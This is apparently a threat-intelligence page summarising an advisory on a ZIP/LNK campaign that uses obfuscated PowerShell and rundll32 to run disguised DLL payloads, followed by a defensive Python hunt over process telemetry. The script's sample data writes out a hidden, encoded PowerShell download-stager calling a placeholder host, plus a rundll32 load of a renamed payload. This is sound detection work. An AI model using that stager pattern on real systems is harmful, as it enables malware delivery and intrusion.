
Credential-themed ZIP/LNK PowerShell delivery campaign targeting management users

Campaign
Happening score: 37
1 unique source, 1 article

Summary


A credential-themed ZIP/LNK delivery campaign uses obfuscated PowerShell to fetch DLL payloads, creating a stealthy foothold risk for users in the management vertical. The lures promise passport scans and payment records to encourage clicks. The chain executes the payload through rundll32.exe and swaps payload files when it detects antivirus processes.

Related Happenings

Formbook phishing campaign using DLL sideloading and obfuscated JavaScript

Campaign
First: 20.04.2026 18:01 Last: 20.04.2026 18:01 Sources 1

About this happening: The **Formbook** phishing operation is targeting **Windows** organizations across **Greece, Spain, Slovenia, Bosnia, Croatia** and **South America**, using **DLL sideloading** and...

InstallFix Claude Code malvertising campaign

Campaign
First: 06.03.2026 17:00 Last: 06.03.2026 17:00 Sources 1

About this happening: **InstallFix** is being used in an active **malvertising** operation that pushes cloned **Claude Code** install pages and malicious CLI instructions, putting users who search for...

OAuth-phished ZIP/LNK/PowerShell malware delivery chain

Malware Activity
First: 03.03.2026 11:20 Last: 03.03.2026 11:20 Sources 1

About this happening: **ZIP-delivered malware** now uses a **PowerShell** and **DLL side-loading** chain to infect Windows devices and reach an external **C2 server**, increasing the risk of follow-on...

CRESCENTHARVEST Windows RAT and info-stealer activity

Malware Activity
First: 19.02.2026 10:13 Last: 19.02.2026 10:13 Sources 1

About this happening: The **CRESCENTHARVEST** malware activity centers on **version.dll**, a **Windows RAT and information stealer** that can execute commands, log keystrokes, and exfiltrate data. It m...

ClickFix DNS-based nslookup staging campaign

Campaign
First: 15.02.2026 16:10 Last: 15.02.2026 16:10 Sources 1

About this happening: The **ClickFix** campaign has added **DNS-based staging** that uses **nslookup** in the **Windows Run dialog** to fetch and run a second-stage payload, making malicious execution...

Timeline

  1. 01.10.2025 18:00 · 2 articles

    BlackPoint advisory on credential-themed ZIP/LNK PowerShell delivery campaign

    Initial Disclosure

    BlackPoint describes a campaign that uses credential-themed ZIP archives containing malicious .lnk files. Opening the shortcut quietly launches obfuscated PowerShell, which downloads DLL payloads disguised as .ppt files and executes them with rundll32.exe; the targets are users in the management vertical. The advisory notes that the dropper checks for common antivirus processes and switches payload files for stealth. It recommends blocking or detonating LNK files found in archives, enforcing Mark of the Web, restricting rundll32 usage, and instrumenting PowerShell with script block logging, transcription, AMSI, and TLS inspection.

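The chain in the advisory (LNK double-clicked in Explorer, hidden/encoded PowerShell, rundll32.exe loading a module that is not a .dll) leaves a recognisable parent-child pattern in process-creation telemetry. The hunt below is an added example written for this page, not BlackPoint's code or a published detection. It assumes Sysmon Event ID 1 style records flattened to dicts with ProcessId, ParentProcessId, Image and CommandLine fields; the sample events, the stager text and the URL inside it are constructed for illustration.

```python
"""Hunt for the ZIP/LNK -> obfuscated PowerShell -> rundll32 chain in
process-creation telemetry. Added example, not BlackPoint's code; field
names, sample events and the example.invalid URL are assumptions."""
import base64
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

PS_IMAGE = re.compile(r"\\(powershell|pwsh)\.exe$", re.I)
RUNDLL_IMAGE = re.compile(r"\\rundll32\.exe$", re.I)
EXPLORER_IMAGE = re.compile(r"\\explorer\.exe$", re.I)

# -EncodedCommand and the prefix abbreviations PowerShell accepts (-e, -ec, -enc ...)
ENC_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
HIDDEN_FLAG = re.compile(r"-w[a-z]*\s+hidden", re.I)        # -W Hidden, -WindowStyle Hidden
BYPASS_FLAG = re.compile(r"-e[a-z]*\s+bypass", re.I)        # -Ep Bypass, -ExecutionPolicy Bypass


@dataclass
class Finding:
    rule: str
    pid: int
    detail: str


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext of a -EncodedCommand argument (base64 of UTF-16LE), or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def rundll32_module(cmdline: str) -> Optional[str]:
    """Extract the module rundll32 was asked to load from 'rundll32.exe <module>,<entry>'."""
    parts = cmdline.split(None, 1)
    if len(parts) < 2:
        return None
    arg = parts[1].strip().strip('"')
    return arg.split(",", 1)[0].strip().strip('"')


def analyze(events: List[Dict]) -> List[Finding]:
    """Apply three rules that together describe the advisory's execution chain."""
    by_pid = {e["ProcessId"]: e for e in events}
    findings: List[Finding] = []
    for e in events:
        img, cmd, pid = e["Image"], e["CommandLine"], e["ProcessId"]
        parent = by_pid.get(e["ParentProcessId"])
        parent_img = parent["Image"] if parent else e.get("ParentImage", "")

        # Rule 1: PowerShell launched by Explorer (what a double-clicked LNK looks like)
        # with hidden window / policy bypass / encoded command. An LNK opened from an
        # archiver window would show that archiver as parent instead; extend as needed.
        if PS_IMAGE.search(img) and EXPLORER_IMAGE.search(parent_img):
            flags = [name for name, rx in (("hidden", HIDDEN_FLAG), ("bypass", BYPASS_FLAG),
                                           ("encoded", ENC_FLAG)) if rx.search(cmd)]
            if flags:
                decoded = decode_encoded_command(cmd) or ""
                findings.append(Finding("ps_from_explorer_obfuscated", pid,
                                        f"flags={flags} decoded={decoded[:80]!r}"))

        if RUNDLL_IMAGE.search(img):
            # Rule 2: the module handed to rundll32 does not carry a .dll extension
            # (the advisory's payloads are DLLs renamed to .ppt).
            mod = rundll32_module(cmd) or ""
            if mod and not mod.lower().endswith(".dll"):
                findings.append(Finding("rundll32_nondll_module", pid, mod))
            # Rule 3: rundll32 is a direct child of PowerShell.
            if parent and PS_IMAGE.search(parent["Image"]):
                findings.append(Finding("rundll32_child_of_powershell", pid, cmd))
    return findings


# Constructed sample telemetry (not real logs). The stager is built here so the
# -Enc argument is a genuine UTF-16LE/base64 encoding of the string.
STAGER = ("IEX (New-Object Net.WebClient).DownloadFile("
          "'http://example.invalid/a.ppt','C:\\Users\\Public\\Passport.ppt')")
ENC = base64.b64encode(STAGER.encode("utf-16le")).decode()
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"ProcessId": 4100, "ParentProcessId": 3020, "Image": r"C:\Windows\explorer.exe",
     "CommandLine": "explorer.exe"},
    {"ProcessId": 5212, "ParentProcessId": 4100, "Image": PS,
     "CommandLine": f"powershell.exe -NoP -W Hidden -Ep Bypass -Enc {ENC}"},
    {"ProcessId": 5300, "ParentProcessId": 5212, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Users\Public\Passport.ppt,DllMain"},
    # benign: Control Panel applet launched from Explorer
    {"ProcessId": 6000, "ParentProcessId": 4100, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe shell32.dll,Control_RunDLL"},
    # benign: admin runs a script from a console whose parent is not in the sample
    {"ProcessId": 6100, "ParentProcessId": 7000, "Image": PS,
     "CommandLine": r"powershell.exe -File C:\Scripts\backup.ps1"},
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"{f.rule:32} pid={f.pid} {f.detail}")
```

Rule 1 and Rule 3 each fire on their own process and so can be correlated by ProcessId into one incident; Rule 2 is the cheapest to deploy on its own and pairs naturally with the advisory's recommendation to restrict rundll32 usage. Script block logging (Event ID 4104) would additionally expose the decoded stager even when the operator switches from -EncodedCommand to string-concatenation obfuscation that this command-line check does not see.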